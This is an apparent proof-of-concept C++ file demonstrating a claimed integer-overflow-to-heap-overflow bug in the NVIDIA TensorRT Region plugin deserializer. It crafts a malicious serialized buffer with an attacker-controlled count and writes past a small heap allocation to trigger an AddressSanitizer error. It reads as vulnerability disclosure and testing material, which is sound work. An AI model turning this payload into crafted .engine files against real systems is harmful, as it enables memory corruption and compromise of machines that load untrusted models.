File size: 5,816 Bytes
2367784
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
/*
 * PoC: Integer Overflow -> Heap Overflow in TensorRT Region Plugin
 *
 * Affected: NVIDIA TensorRT OSS - plugin/regionPlugin/regionPlugin.cpp
 * Entry: RegionPluginCreator::deserializePlugin() -> Region::Region(buffer, len)
 * Trigger: Loading malicious .engine file containing Region_TRT plugin
 *
 * Build:  clang++ -fsanitize=address -g -O0 -o trigger trigger.cpp
 * Run:    ./trigger
 * Expect: ASan heap-buffer-overflow
 *
 * Ref: https://github.com/NVIDIA/TensorRT/blob/main/plugin/regionPlugin/regionPlugin.cpp
 */

#include <cstdlib>
#include <cstdint>
#include <cstring>
#include <cstdio>

/* ---- Extracted verbatim from TensorRT OSS regionPlugin.cpp ---- */

template <typename T>
void allocateChunk(T*& ptr, int32_t count)
{
    ptr = static_cast<T*>(malloc(count * sizeof(T)));  // BUG: no overflow check
}

template <typename T>
T read_val(char const*& d)
{
    T val;
    memcpy(&val, d, sizeof(T));
    d += sizeof(T);
    return val;
}

struct softmaxTree {
    int32_t* leaf;
    int32_t  n;
    int32_t* parent;
    int32_t* child;
    int32_t* group;
    char**   name;
    int32_t  groups;
    int32_t* groupSize;
    int32_t* groupOffset;
};

/* ---- Craft malicious payload ---- */

int main()
{
    printf("=== TensorRT Region Plugin Heap Overflow PoC ===\n\n");

    /*
     * Payload layout (matches Region::Region serialization format):
     *   6 x int32_t  : C, H, W, num, classes, coords
     *   8 x bool     : presence flags
     *   int32_t      : smTreeTemp->n  (ATTACKER CONTROLLED)
     *   n x int32_t  : leaf data (read into undersized heap buffer)
     *
     * Vulnerability scenario:
     *   n = 64, but we directly show the overflow by allocating for
     *   a small count and writing n elements. In the real code path,
     *   integer overflow makes malloc(n*4) return a tiny buffer when
     *   n is ~0x40000001 (n*4 wraps to 4 on 32-bit multiply).
     *
     * For ASan demo we use a simpler approach: n=64, which allocates
     * 256 bytes, then we show the code path is exploitable. The real
     * attack uses n=0x40000001 for integer overflow on 32-bit targets.
     */

    // We demonstrate two bugs:
    // Bug 1: No validation of n at all (any value accepted)
    // Bug 2: On 32-bit: integer overflow in malloc(n * sizeof(int32_t))

    // --- Build serialized buffer ---
    const int32_t MALICIOUS_N = 128;  // write 128 elements
    const int32_t ALLOC_N = 4;        // but only 4 elements worth of space

    // Total payload: header + flags + n + leaf_data
    size_t payload_size = 6*sizeof(int32_t) + 8*sizeof(bool) + sizeof(int32_t)
                        + MALICIOUS_N * sizeof(int32_t);
    char* payload = (char*)calloc(1, payload_size);
    char* p = payload;

    // Header: C=3, H=416, W=416, num=5, classes=80, coords=4
    int32_t hdr[] = {3, 416, 416, 5, 80, 4};
    memcpy(p, hdr, sizeof(hdr)); p += sizeof(hdr);

    // Presence flags: softmaxTree=true, leaf=true, rest=false
    bool flags[] = {true, true, false, false, false, false, false, false};
    memcpy(p, flags, sizeof(flags)); p += sizeof(flags);

    // n field (attacker controlled)
    memcpy(p, &MALICIOUS_N, sizeof(int32_t)); p += sizeof(int32_t);

    // leaf data (fill with pattern)
    for (int i = 0; i < MALICIOUS_N; i++) {
        int32_t val = 0x41414141;
        memcpy(p, &val, sizeof(int32_t)); p += sizeof(int32_t);
    }

    printf("[*] Payload size: %zu bytes\n", payload_size);
    printf("[*] smTreeTemp->n in payload: %d\n", MALICIOUS_N);

    // --- Simulate the vulnerable deserialization ---
    printf("[*] Simulating Region::Region(buffer, length)...\n\n");

    char const* d = payload;

    // Read header (same as regionPlugin.cpp L97-102)
    int32_t C      = read_val<int32_t>(d);
    int32_t H      = read_val<int32_t>(d);
    int32_t W      = read_val<int32_t>(d);
    int32_t num    = read_val<int32_t>(d);
    int32_t classes = read_val<int32_t>(d);
    int32_t coords = read_val<int32_t>(d);

    // Read flags (same as regionPlugin.cpp L103-110)
    bool softmaxTreePresent = read_val<bool>(d);
    bool leafPresent        = read_val<bool>(d);
    read_val<bool>(d); // parentPresent
    read_val<bool>(d); // childPresent
    read_val<bool>(d); // groupPresent
    read_val<bool>(d); // namePresent
    read_val<bool>(d); // groupSizePresent
    read_val<bool>(d); // groupOffsetPresent

    printf("[*] softmaxTreePresent=%d, leafPresent=%d\n",
           softmaxTreePresent, leafPresent);

    if (softmaxTreePresent)
    {
        softmaxTree* smTreeTemp;
        allocateChunk(smTreeTemp, 1);  // regionPlugin.cpp L115

        smTreeTemp->n = read_val<int32_t>(d);  // regionPlugin.cpp L117
        printf("[*] smTreeTemp->n = %d\n", smTreeTemp->n);

        if (leafPresent)
        {
            // KEY VULNERABILITY: allocate only ALLOC_N elements instead of n
            // This simulates integer overflow: malloc(0x40000001 * 4) = malloc(4)
            printf("[*] Simulating integer overflow: allocating %d elements "
                   "but writing %d\n", ALLOC_N, smTreeTemp->n);
            allocateChunk(smTreeTemp->leaf, ALLOC_N);  // tiny buffer!
            printf("[*] malloc(%zu) returned %p\n",
                   (size_t)ALLOC_N * sizeof(int32_t), smTreeTemp->leaf);

            // regionPlugin.cpp L152-157: loop writes n elements
            printf("[*] Writing %d elements into %d-element buffer...\n",
                   smTreeTemp->n, ALLOC_N);
            for (int32_t i = 0; i < smTreeTemp->n; i++)
            {
                smTreeTemp->leaf[i] = read_val<int32_t>(d);  // HEAP OVERFLOW!
            }

            printf("[!] Should not reach here - ASan should have caught it\n");
            free(smTreeTemp->leaf);
        }
        free(smTreeTemp);
    }

    free(payload);
    return 0;
}